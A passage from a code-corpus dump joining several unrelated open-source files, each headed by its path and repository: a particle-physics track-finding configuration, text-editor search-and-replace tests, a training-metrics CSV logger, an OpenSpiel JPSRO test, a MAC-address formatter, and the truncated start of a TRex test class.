# The assumed bend resolution is specified in StubCuts.BendCut.
UseBendFilter = cms.bool(True),
# Use filter in each HT cell, preventing more than the specified number of stubs being stored in the cell. (Reflecting memory limit of hardware). N.B. Results depend on assumed order of stubs.
# N.B. If mini-HT is in use, then this cut applies to coarse-HT.
#MaxStubsInCell = cms.uint32(99999), # Setting this to anything more than 999 disables this option
MaxStubsInCell = cms.uint32(32), # set it equal to value used in hardware.
MaxStubsInCellMiniHough = cms.uint32(16), # Same type of cut for mini-HT (if in use)
# If BusySectorKill = True, and more than BusySectorNumStubs stubs are assigned to tracks by an r-phi HT array, then the excess tracks are killed, with lowest Pt ones killed first. This is because HT hardware has finite readout time.
BusySectorKill = cms.bool(True),
BusySectorNumStubs = cms.uint32(162), # Or 144 if only 320 MHz FW.
# If BusySectorMbinRanges is not empty, then the BusySectorNumStubs cut is instead applied to the subset of tracks appearing in the following m bin (q/Pt) ranges of the HT array. The sum of the entries in the vector should equal the number of m bins in the HT. (N.B. If EnableMerge2x2 or MiniHTstage = True, then the m bin ranges here correspond to the bins before merging. Also in these cases, the odd m-bin numbers don't correspond to HT outputs, so should be all grouped together on a single imaginary link).
# If BusySectorMbinOrder is not empty, then the m-bins are grouped in the specified order, instead of sequentially.
# (Histos NumStubsPerLink, NumStubsVsLink & MeanStubsPerLink useful for optimising this option).
#
# Choice for 16x32 coarse HT array followed by 2x2 mini-HT array with 3 GeV Pt threshold.
BusySectorMbinRanges = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 16),
BusySectorMbinOrder = cms.vuint32(0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30, 1,3,5,7,9,11,13,15,17,19,21,23,25,27,29,31),
# Choice for 24x32 coarse HT array followed by 2x2 mini-HT array with 2 GeV Pt threshold.
#BusySectorMbinRanges = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 24),
#BusySectorMbinOrder = cms.vuint32(0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46, 1,3,5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39,41,43,45,47),
#
# If BusyInputSectorKill = True, and more than BusyInputSectorNumStubs are input to the HT array from the GP, then
# the excess stubs are killed. This is because HT hardware has finite readin time.
# Results unreliable as depend on assumed order of stubs.
BusyInputSectorKill = cms.bool(True),
BusyInputSectorNumStubs = cms.uint32(162), # Or 144 if only 320 MHz FW
# Multiplex the outputs from several HTs onto a single pair of output optical links?
# Options: 0 = disable Mux; 1 = Sept 2019 Mux (transerse HT readout by m-bin), with single m bin in entire nonant going to each link.
MuxOutputsHT = cms.uint32(1),
# If this is non-empty, then only the specified eta sectors are enabled, to study them individually.
EtaRegWhitelist = cms.vuint32()
),
#=== Options controlling r-z track filters (or any other track filters run after the Hough transform, as opposed to inside it).
#=== (Irrelevant for track fitters that don't require any r-z filter run before them).
RZfilterOpts = cms.PSet(
# Specify preferred r-z filter (from those available inside TrkRZfilter.cc) - currently only "SeedFilter".
RZFilterName = cms.string("SeedFilter"),
#--- Options relevant for Seed filter, (so only relevant if rzFilterName="SeedFilter").
# Cut at this many standard deviations on seed resolution.
SeedResCut = cms.double(1.732),
# Store stubs compatible with all possible good seed.
KeepAllSeed = cms.bool(False),
# Maximum number of seed combinations to bother checking per track candidate.
#MaxSeedCombinations = cms.uint32(999),
MaxSeedCombinations = cms.uint32(15),
# Maximum number of seed combinations consistent with (z0,eta) sector constraints to bother checking per track candidate.
#MaxGoodSeedCombinations = cms.uint32(13),
MaxGoodSeedCombinations = cms.uint32(10),
# Maximum number of seeds that a single stub can be included in.
MaxSeedsPerStub = cms.uint32(4),
# Reject tracks whose estimated rapidity from seed filter is inconsistent range of with eta sector. (Kills some duplicate tracks).
zTrkSectorCheck = cms.bool(True),
# Min. number of layers in rz track that must have stubs for track to be declared found by seed filter.
MinFilterLayers = cms.uint32(4)
),
#=== Rules for deciding when the (HT) track finding has found an L1 track candidate
L1TrackDef = cms.PSet(
# Min. number of layers the track must have stubs in.
MinStubLayers = cms.uint32(5),
# Change min. number of layers cut to (MinStubLayers - 1) for tracks with Pt exceeding this cut.
# If this is set to a -ve number, this option is disabled.
MinPtToReduceLayers = cms.double(-99999.),
# Change min. number of layers cut to (MinStubLayers - 1) for tracks in these rapidity sectors.
# (Histogram "AlgEffVsEtaSec" will help you identify which sectors to declare).
#EtaSecsReduceLayers = cms.vuint32(),
EtaSecsReduceLayers = cms.vuint32(5,12),
# Reduce this layer ID, so that it takes no more than 8 different values in any eta region (simplifies firmware).
ReducedLayerID = cms.bool(True)
),
#=== Specification of algorithm to eliminate duplicate tracks.
DupTrkRemoval = cms.PSet(
# Algorithm run on tracks after the track helix fit has been done.
# (Disable dup removal = 0; two alternative algos = 1 or 2).
DupTrkAlgFit = cms.uint32(1)
),
#=== Rules for deciding when a reconstructed L1 track matches a MC truth particle (i.e. tracking particle).
TrackMatchDef = cms.PSet(
#--- Three different ways to define if a tracking particle matches a reco track candidate. (Usually, set two of them to ultra loose).
# Min. fraction of matched stubs relative to number of stubs on reco track.
MinFracMatchStubsOnReco = cms.double(-99.),
# Min. fraction of matched stubs relative to number of stubs on tracking particle.
MinFracMatchStubsOnTP = cms.double(-99.),
# Min. number of matched layers.
MinNumMatchLayers = cms.uint32(4),
# Min. number of matched PS layers.
MinNumMatchPSLayers = cms.uint32(0),
# Associate stub to TP only if the TP contributed to both its clusters? (If False, then associate even if only one cluster was made by TP).
StubMatchStrict = cms.bool(False)
),
#=== Track Fitting Algorithm Settings.
TrackFitSettings = cms.PSet(
#
#--- Options applicable to all track fitters ---
#
# Track Fitting algortihms to use. You can run several in parallel.
# TrackFitLinearAlgo & ChiSquared* are chi2 fits, KF* is a Kalman filter fit,
# & SimpleLR4 is a linear regression fit that neglects the hit uncertainties.
# The number 4 or 5 in the name indicates if 4 or 5 helix parameters are fitted.
# Options KF4ParamsComb, KF5ParamsComb or SimpleLR4 are the best ones.
# KF*ParamsCombHLS is the HLS version of the code, which only works if linked with Vivado libraries.
TrackFitters = cms.vstring(
# "ChiSquaredFit4",
# "SimpleLR4",
# "KF4ParamsCombHLS",
# "KF5ParamsCombHLS",
"KF5ParamsComb",
"KF4ParamsComb"
),
# Indicate subset of fitters wanting r-z track filter to be run before them. (Irrelevant for those not specified in "TrackFitters").
# Typically, Chi2 & LR fits work best with r-z filter & KF works best without it.
UseRZfilter = cms.vstring(
"ChiSquaredFit4",
"SimpleLR4"
),
# Print detailed summary of track fit performance at end of job (as opposed to a brief one).
DetailedFitOutput = cms.bool(False),
#
# Use MC truth to eliminate all fake tracks & all incorrect stubs assigned to tracks before doing fit.
TrackFitCheat = cms.bool(False),
#
#--- Options for chi2 track fitter ---
#
# Number of fitting iterations to undertake. (15 is not realistic in hardware, but is necessary to kill bad hits)
NumTrackFitIterations = cms.uint32(15),
# Optionally kill hit with biggest residuals in track fit (occurs after the first fit, so three iterations would have two killings).
KillTrackFitWorstHit = cms.bool(True),
# Cuts in standard deviations used to kill hits with big residuals during fit. If the residual exceeds the "General" cut, the hit is killed providing it leaves the track with enough hits to survive. If the residual exceeds the "Killing" cut, the hit is killed even if that kills the track.
GeneralResidualCut = cms.double(3.0),
KillingResidualCut = cms.double(20.0),
#
#--- Additional options for <NAME>'s Linear Regression track fitter ---
#
# Maximum allowed number of iterations of LR fitter.
MaxIterationsLR = cms.uint32( 8 ),
# If False: residual of a stub is the max of its r-phi & r-z residuals.
# If True: the residual is the mean of these residuals.
CombineResiduals = cms.bool( True ),
# Correct stub phi coordinate for higher orders in circle expansion, so that a trajectory is straight in r-phi.
LineariseStubPosition = cms.bool( True ),
# Checks if the fitted track is consistent with the sector, if not it will be not accepted.
CheckSectorConsistency = cms.bool( False ),
# Checks if the fitted track r phi parameter are consistent with the HT candidate parameter within in range of +- 2 cells.
CheckHTCellConsistency = cms.bool( False ),
# Tracks must have stubs in at least this number of PS layers.
MinPSLayers = cms.uint32( 2 ),
# Digitization
DigitizeLR = cms.bool( False ),
PhiPrecision = cms.double( 0.009 / 108. ),
RPrecision = cms.double( 0.14 ),
ZPrecision = cms.double( 0.28 ),
ZSlopeWidth = cms.uint32( 11 ),
ZInterceptWidth = cms.uint32( 11 ),
#
#--- Additional options for <NAME>'s Simple Linear Regression track fitter ---
#
# Digitize Simple Linear Regression variables and calculation. (Disabled if EnableDigitize=False).
DigitizeSLR = cms.bool(False), # Disable, as was never retuned for nonants
# Number of bits to be used in hardware to compute the division needed to calculate the helix params
DividerBitsHelix = cms.uint32(23),
DividerBitsHelixZ = cms.uint32(23),
# Number of bits to reduce the rphi helix parameter calculation weight
ShiftingBitsDenRPhi = cms.uint32(14),
# Number of bits to reduce the rphi helix parameter calculation weight
ShiftingBitsDenRZ = cms.uint32(14),
# Number of bits to reduce the phi0 parameter calculation weight
ShiftingBitsPhi = cms.uint32(10),
# Number of bits to reduce the qOverPt parameter calculation weight
ShiftingBitsPt = cms.uint32(3),
# Number of bits to reduce the tanLambda parameter calculation weight
ShiftingBitsLambda = cms.uint32(1),
# Number of bits to reduce the z0 parameter calculation weight
ShiftingBitsZ0 = cms.uint32(16),
# Fit ChiSquare Cut (tightening reduces fake track rate at cost of efficiency)
SLR_chi2cut = cms.double(300.),
# Cut on Rphi Residuals (radians) - stubs killed until only 4 left or all have residuals below this cut.
ResidualCut = cms.double(0.0),
#ResidualCut = cms.double(0.0005), # This allows more than 4 stubs per track.
#
#--- Options for Kalman filter track fitters ---
#
# Larger number has more debug printout. "1" is useful for understanding why tracks are lost, best combined with TrackFitCheat=True.
KalmanDebugLevel = cms.uint32(0),
# Fit will reject fitted tracks unless it can assign at least this number of stubs to them.
KalmanMinNumStubs = cms.uint32(4),
# Fit will attempt to add up to this nummber of stubs to each fitted tracks, but won't bother adding more.
KalmanMaxNumStubs = cms.uint32(4),
# For 5-param helix fits, calculate also beam-constrained helix params after fit is complete, & use them for duplicate removal if DupTrkAlgFit=1.
KalmanAddBeamConstr = cms.bool(True),
# Remove requirement of at least 2 PS layers per track.
KalmanRemove2PScut = cms.bool(False),
# Allow the KF to skip this many layers in total per track.
KalmanMaxSkipLayersHard = cms.uint32(1), # For HT tracks with many stubs
KalmanMaxSkipLayersEasy = cms.uint32(2), # For HT tracks with few stubs
KalmanMaxStubsEasy = cms.uint32(10), # Max stubs an HT track can have to be "easy".
KFUseMaybeLayers = cms.bool(False), # Disable "maybe layer" to match with firmware
#--- Cuts applied to KF states as a function of the last KF tracker layer they had a stub in.
# (If "4" or "5" in name, cut only applies to 4 or 5 param helix fit).
KFLayerVsPtToler = cms.vdouble(999., 999., 0.1 , 0.1 , 0.05, 0.05, 0.05),
# d0 cut only applied to 5 param helix fit.
KFLayerVsD0Cut5 = cms.vdouble(999., 999., 999., 10. , 10. , 10. ,10. ),
KFLayerVsZ0Cut5 = cms.vdouble(999., 999., 25.5, 25.5, 25.5, 25.5,25.5 ),
KFLayerVsZ0Cut4 = cms.vdouble(999., 999. ,15. , 15. , 15. , 15. ,15. ),
# Chi2 cuts should be retuned if KalmanMultiScattTerm value changed.
KFLayerVsChiSq5 = cms.vdouble(999., 999., 10. , 30. , 80. , 120., 160.),
KFLayerVsChiSq4 = cms.vdouble(999., 999., 10. , 30. , 80. , 120., 160.),
# KF will consider at most this #stubs per layer to save time.
KalmanMaxStubsPerLayer = cms.uint32(4),
# Multiple scattering term - inflate hit phi errors by this divided by Pt
# (0.00075 gives best helix resolution & 0.00450 gives best chi2 distribution).
KalmanMultiScattTerm = cms.double(0.00075),
# Scale down chi2 in r-phi plane by this factor to improve electron performance (should be power of 2)
KalmanChi2RphiScale = cms.uint32(8),
# N.B. KF track fit chi2 cut is not cfg param, but instead is hard-wired in KF4ParamsComb::isGoodState(...).
#--- Enable Higher order corrections
# Treat z uncertainty in tilted barrel modules correctly.
KalmanHOtilted = cms.bool(False),
# Higher order circle explansion terms for low Pt.
KalmanHOhelixExp = cms.bool(False),
# Alpha correction for non-radial 2S endcap strips. (0=disable correction, 1=correct with offset, 2=correct with non-diagonal stub covariance matrix). -- Option 1 is easier in FPGA, but only works if fit adds PS stubs before 2S ones.
KalmanHOalpha = cms.uint32(0),
# Projection from (r,phi) to (z,phi) for endcap 2S modules. (0=disable correction, 1=correct with offset, 2=correct with non-diagonal stub covariance matrix). -- Option 1 is easier in FPGA, but only works if fit adds PS stubs before 2S ones.
KalmanHOprojZcorr = cms.uint32(0),
# Use approx calc to account for non-radial endcap 2S modules corresponding to current FW, with no special treatment for tilted modules.
KalmanHOfw = cms.bool(True)
),
#=== Treatment of dead modules.
DeadModuleOpts = cms.PSet(
# Emulate dead/inefficient modules using the StubKiller code, with stubs killed according to the scenarios of the Stress Test group.
# (0=Don't kill any stubs; 1-5 = Scenarios described in StubKiller.cc)
KillScenario = cms.uint32(0),
# Modify TMTT tracking to try to recover tracking efficiency in presence of dead modules. (Does nothing if KillScenario = 0).
KillRecover = cms.bool (True)
),
#=== Fitted track digitisation.
TrackDigi=cms.PSet(
# For firmware reasons, can't use common digitisation cfg for all fitters.
#======= SimpleLR4 digi parameters ========
SLR_skipTrackDigi = cms.bool( False ), # Optionally skip track digitisation if done internally inside fitting code.
SLR_oneOver2rBits = cms.uint32(13),
SLR_oneOver2rRange = cms.double(0.01354135),
SLR_d0Bits = cms.uint32(12), # Made up by Ian as never yet discussed.
SLR_d0Range = cms.double(10.),
SLR_phi0Bits = cms.uint32(18),
SLR_phi0Range = cms.double(1.3962636), # phi0 is actually only digitised relative to centre of sector.
SLR_z0Bits = cms.uint32(12),
SLR_z0Range = cms.double(51.555509),
SLR_tanlambdaBits = cms.uint32(15),
SLR_tanlambdaRange = cms.double(32.0),
SLR_chisquaredBits = cms.uint32(10),
SLR_chisquaredRange = cms.double(512.),
#====== Kalman Filter digi parameters ========
KF_skipTrackDigi = cms.bool( False ), # Optionally skip track digitisation if done internally inside fitting code.
KF_oneOver2rBits = cms.uint32(15),
KF_oneOver2rRange = cms.double(0.0076171313), # pT > 1.5 GeV
KF_d0Bits = cms.uint32(12),
KF_d0Range = cms.double(31.992876),
KF_phi0Bits = cms.uint32(12),
KF_phi0Range = cms.double(0.6981317), # phi0 digitised relative to centre of sector. (Required range 2pi/18 + 2*overlap; overlap = 0.19206rads*(2GeV/ptCut)*(chosenR/67.24). MUST DOUBLE TO GO TO 2 GEV.
KF_z0Bits = cms.uint32(12),
KF_z0Range = cms.double(45.826419),
KF_tanlambdaBits = cms.uint32(16),
KF_tanlambdaRange = cms.double(16.),
KF_chisquaredBits = cms.uint32(15), # N.B. 17 bits are used internally inside KF.
KF_chisquaredRange = cms.double(1024.),
KF_chisquaredBinEdges = cms.vdouble(0, 0.5, 1, 2, 3, 5, 7, 10, 20, 40, 100, 200, 500, 1000, 3000 ), # Additional bin for >3000
KF_bendchisquaredBinEdges = cms.vdouble(0, 0.5, 1, 2, 3, 5, 10, 50 ), # Additional bin for >50
#====== Other track fitter Digi params.
# Currently equal to those for KF, although you can skip track digitisation for them with following.
Other_skipTrackDigi = cms.bool( True )
),
#===== Use HYBRID TRACKING (Tracklet pattern reco + TMTT KF -- requires tracklet C++ too) =====
Hybrid = cms.bool( False),
#===== Debug plot options
# When making helix parameter resolution plots, only use particles from the physics event (True)
# or also use particles from pileup (False) ?
ResPlotOpt = cms.bool (True)
)
|
py_cui/dialogs/__init__.py
|
ne-msft/py_cui
| 654 |
79311
|
"""A collection of modules containing dialog-style widgets and popups.
"""
import py_cui.dialogs.form
import py_cui.dialogs.filedialog
|
tests/features/replace_test.py
|
nacleric/babi
| 223 |
79327
|
from __future__ import annotations
import pytest
from testing.runner import and_exit
@pytest.mark.parametrize('key', ('^C', 'Enter'))
def test_replace_cancel(run, key):
with run() as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press(key)
h.await_text('cancelled')
def test_replace_invalid_regex(run):
with run() as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('(')
h.await_text("invalid regex: '('")
def test_replace_invalid_replacement(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_0')
h.await_text('replace with:')
h.press_and_enter('\\')
h.await_text('invalid replacement string')
def test_replace_cancel_at_replace_string(run):
with run() as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('hello')
h.await_text('replace with:')
h.press('^C')
h.await_text('cancelled')
@pytest.mark.parametrize('key', ('y', 'Y'))
def test_replace_actual_contents(run, ten_lines, key):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_0')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press(key)
h.await_text_missing('line_0')
h.await_text('ohai')
h.await_text(' *')
h.await_text('replaced 1 occurrence')
def test_replace_sets_x_hint_properly(run, tmpdir):
f = tmpdir.join('f')
contents = '''\
beginning_line
match me!
'''
f.write(contents)
with run(str(f)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('me!')
h.await_text('replace with:')
h.press_and_enter('youuuu')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_cursor_position(x=6, y=3)
h.press('Up')
h.press('Up')
h.await_cursor_position(x=6, y=1)
def test_replace_cancel_at_individual_replace(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter(r'line_\d')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('^C')
h.await_text('cancelled')
def test_replace_unknown_characters_at_individual_replace(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter(r'line_\d')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('?')
h.press('^C')
h.await_text('cancelled')
def test_replace_say_no_to_individual_replace(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_[135]')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_1')
h.press('n')
h.await_text('line_3')
h.press('y')
h.await_text_missing('line_5')
h.await_text('replaced 2 occurrences')
def test_replace_all(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter(r'line_(\d)')
h.await_text('replace with:')
h.press_and_enter(r'ohai+\1')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text_missing('line')
h.await_text('ohai+1')
h.await_text('replaced 10 occurrences')
def test_replace_with_empty_string(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_1')
h.await_text('replace with:')
h.press('Enter')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_1')
def test_replace_search_not_found(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('wat')
# TODO: would be nice to not prompt for a replace string in this case
h.await_text('replace with:')
h.press('Enter')
h.await_text('no matches')
def test_replace_small_window_size(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line')
h.await_text('replace with:')
h.press_and_enter('wat')
h.await_text('replace [yes, no, all]?')
with h.resize(width=8, height=24):
h.await_text('replace…')
h.press('^C')
def test_replace_height_1_highlight(run, tmpdir):
f = tmpdir.join('f')
f.write('x' * 90)
with run(str(f)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('^x+$')
h.await_text('replace with:')
h.press('Enter')
h.await_text('replace [yes, no, all]?')
with h.resize(width=80, height=1):
h.await_text_missing('xxxxx')
h.await_text('xxxxx')
h.press('^C')
def test_replace_line_goes_off_screen(run):
with run() as h, and_exit(h):
h.press(f'{"a" * 20}{"b" * 90}')
h.press('^A')
h.await_text(f'{"a" * 20}{"b" * 59}»')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('b+')
h.await_text('replace with:')
h.press_and_enter('wat')
h.await_text('replace [yes, no, all]?')
h.await_text(f'{"a" * 20}{"b" * 59}»')
h.press('y')
h.await_text(f'{"a" * 20}wat')
h.await_text('replaced 1 occurrence')
def test_replace_undo_undoes_only_one(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line')
h.await_text('replace with:')
h.press_and_enter('wat')
h.press('y')
h.await_text_missing('line_0')
h.press('y')
h.await_text_missing('line_1')
h.press('^C')
h.press('M-u')
h.await_text('line_1')
h.await_text_missing('line_0')
def test_replace_multiple_occurrences_in_line(run):
with run() as h, and_exit(h):
h.press('baaaaabaaaaa')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('a+')
h.await_text('replace with:')
h.press_and_enter('q')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text('bqbq')
def test_replace_after_wrapping(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('Down')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_[02]')
h.await_text('replace with:')
h.press_and_enter('ohai')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_2')
h.press('y')
h.await_text_missing('line_0')
h.await_text('replaced 2 occurrences')
def test_replace_after_cursor_after_wrapping(run):
with run() as h, and_exit(h):
h.press('baaab')
h.press('Left')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('b')
h.await_text('replace with:')
h.press_and_enter('q')
h.await_text('replace [yes, no, all]?')
h.press('n')
h.press('y')
h.await_text('replaced 1 occurrence')
h.await_text('qaaab')
def test_replace_separate_line_after_wrapping(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('Down')
h.press('Down')
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('line_[01]')
h.await_text('replace with:')
h.press_and_enter('_')
h.await_text('replace [yes, no, all]?')
h.press('y')
h.await_text_missing('line_0')
h.press('y')
h.await_text_missing('line_1')
def test_replace_with_newline_characters(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('(line)_([01])')
h.await_text('replace with:')
h.press_and_enter(r'\1\n\2')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text_missing('line_0')
h.await_text_missing('line_1')
h.await_text('line\n0\nline\n1\n')
def test_replace_with_multiple_newline_characters(run, ten_lines):
with run(str(ten_lines)) as h, and_exit(h):
h.press('^\\')
h.await_text('search (to replace):')
h.press_and_enter('(li)(ne)_(1)')
h.await_text('replace with:')
h.press_and_enter(r'\1\n\2\n\3\n')
h.await_text('replace [yes, no, all]?')
h.press('a')
h.await_text_missing('line_1')
h.await_text('li\nne\n1\n\nline_2')
|
logger.py
|
dididixu/ShuffleNetV2-pytorch
| 176 |
79341
|
<reponame>dididixu/ShuffleNetV2-pytorch<filename>logger.py
import csv
import os.path
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import numpy as np
plt.switch_backend('agg')
class CsvLogger:
def __init__(self, filepath='./', filename='results.csv', data=None):
self.log_path = filepath
self.log_name = filename
self.csv_path = os.path.join(self.log_path, self.log_name)
self.fieldsnames = ['epoch', 'val_error1', 'val_error5', 'val_loss', 'train_error1', 'train_error5',
'train_loss']
with open(self.csv_path, 'w') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writeheader()
self.data = {}
for field in self.fieldsnames:
self.data[field] = []
if data is not None:
for d in data:
d_num = {}
for key in d:
d_num[key] = float(d[key]) if key != 'epoch' else int(d[key])
self.write(d_num)
def write(self, data):
for k in self.data:
self.data[k].append(data[k])
with open(self.csv_path, 'a') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writerow(data)
def save_params(self, args, params):
with open(os.path.join(self.log_path, 'params.txt'), 'w') as f:
f.write('{}\n'.format(' '.join(args)))
f.write('{}\n'.format(params))
def write_text(self, text, print_t=True):
with open(os.path.join(self.log_path, 'params.txt'), 'a') as f:
f.write('{}\n'.format(text))
if print_t:
print(text)
def plot_progress_errk(self, claimed_acc=None, title='ShuffleNetv2', k=1):
tr_str = 'train_error{}'.format(k)
val_str = 'val_error{}'.format(k)
plt.figure(figsize=(9, 8), dpi=300)
plt.plot(self.data[tr_str], label='Training error')
plt.plot(self.data[val_str], label='Validation error')
if claimed_acc is not None:
plt.plot((0, len(self.data[tr_str])), (1 - claimed_acc, 1 - claimed_acc), 'k--',
label='Claimed validation error ({:.2f}%)'.format(100. * (1 - claimed_acc)))
plt.plot((0, len(self.data[tr_str])),
(np.min(self.data[val_str]), np.min(self.data[val_str])), 'r--',
label='Best validation error ({:.2f}%)'.format(100. * np.min(self.data[val_str])))
plt.title('Top-{} error for {}'.format(k, title))
plt.xlabel('Epoch')
plt.ylabel('Error')
plt.legend()
plt.xlim(0, len(self.data[tr_str]) + 1)
plt.savefig(os.path.join(self.log_path, 'top{}.png'.format(k)))
def plot_progress_loss(self, title='ShuffleNetv2'):
plt.figure(figsize=(9, 8), dpi=300)
plt.plot(self.data['train_loss'], label='Training')
plt.plot(self.data['val_loss'], label='Validation')
plt.title(title)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.xlim(0, len(self.data['train_loss']) + 1)
plt.savefig(os.path.join(self.log_path, 'loss.png'))
def plot_progress(self, claimed_acc1=None, claimed_acc5=None, title='ShuffleNetv2'):
self.plot_progress_errk(claimed_acc1, title, 1)
self.plot_progress_errk(claimed_acc5, title, 5)
self.plot_progress_loss(title)
plt.close('all')
|
open_spiel/python/algorithms/jpsro_test.py
|
ajain-23/open_spiel
| 3,167 |
79342
|
<filename>open_spiel/python/algorithms/jpsro_test.py
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for open_spiel.python.algorithms.jpsro."""
import itertools
from absl.testing import absltest
from absl.testing import parameterized
from open_spiel.python.algorithms import jpsro
import pyspiel
GAMES = (
"sheriff_2p_gabriele",
)
SWEEP_KWARGS = [
dict( # pylint: disable=g-complex-comprehension
game_name=game,
iterations=iterations,
policy_init=policy_init,
update_players_strategy=update_players_strategy,
target_equilibrium=target_equilibrium,
br_selection=br_selection,
train_meta_solver=train_meta_solver,
eval_meta_solver=eval_meta_solver,
ignore_repeats=ignore_repeats,
) for (
iterations,
game,
policy_init,
update_players_strategy,
target_equilibrium,
br_selection,
train_meta_solver,
eval_meta_solver,
ignore_repeats) in itertools.product(
[2],
GAMES,
jpsro.INIT_POLICIES,
jpsro.UPDATE_PLAYERS_STRATEGY,
jpsro.BRS,
jpsro.BR_SELECTIONS,
jpsro.META_SOLVERS,
["mwcce"],
[True, False])
]
TEST_COUNT_LIMIT = 100
interval = len(SWEEP_KWARGS) // TEST_COUNT_LIMIT
interval = interval if interval % 2 != 0 else interval + 1 # Odd interval.
SWEEP_KWARGS = SWEEP_KWARGS[::interval]
def get_game(game_name):
"""Returns the game."""
if game_name == "kuhn_poker_3p":
game_name = "kuhn_poker"
game_kwargs = {"players": int(3)}
elif game_name == "trade_comm_2p_2i":
game_name = "trade_comm"
game_kwargs = {"num_items": int(2)}
elif game_name == "sheriff_2p_gabriele":
game_name = "sheriff"
game_kwargs = {
"item_penalty": float(1.0),
"item_value": float(5.0),
"max_bribe": int(2),
"max_items": int(10),
"num_rounds": int(2),
"sheriff_penalty": float(1.0),
}
else:
raise ValueError("Unrecognised game: %s" % game_name)
return pyspiel.load_game_as_turn_based(game_name, game_kwargs)
class JPSROTest(parameterized.TestCase, absltest.TestCase):
@parameterized.parameters(*SWEEP_KWARGS)
def test_jpsro_cce(self, **kwargs):
game = get_game(kwargs["game_name"])
jpsro.run_loop(game=game, **kwargs)
if __name__ == "__main__":
absltest.main()
|
ttp/match/mac_eui.py
|
showipintbri/ttp
| 254 |
79349
|
"""
Function to convert MAC address onti EUI style format.
Creds to https://stackoverflow.com/a/29446103 unswers on stackoeverflow
and NAPALM base helpers module
"""
from re import sub
def mac_eui(data):
mac = str(data)
# remove delimiters and convert to lower case
mac = sub("[.:-]", "", mac).lower()
# mac should only contain letters and numbers, also
# if length now not 12 (eg. 008041aefd7e), staff up to
# 12 with "0" - can happen with some vendors
if mac.isalnum():
if not len(mac) == 12:
mac += "0" * (12 - len(mac))
else:
return data, None
# convert mac in canonical form (eg. 00:80:41:ae:fd:7e)
mac = ":".join([mac[i : i + 2] for i, j in enumerate(mac) if not (i % 2)])
return mac, None
|
scripts/automation/regression/stateless_tests/stl_ns_test.py
|
timgates42/trex-core
| 956 |
79361
|
#!/usr/bin/python
from .stl_general_test import CStlGeneral_Test, CTRexScenario
from trex_stl_lib.api import *
from trex.common.stats.trex_ns import CNsStats
from trex.common.services.trex_service_icmp import ServiceICMP
import pprint
class STLNS_Test(CStlGeneral_Test):
"""Tests for NS function """
def setUp(self):
CStlGeneral_Test.setUp(self)
if self.is_vdev:
self.skip("We don't know what to expect with vdev.")
if not (self.is_linux_stack and self.is_loopback):
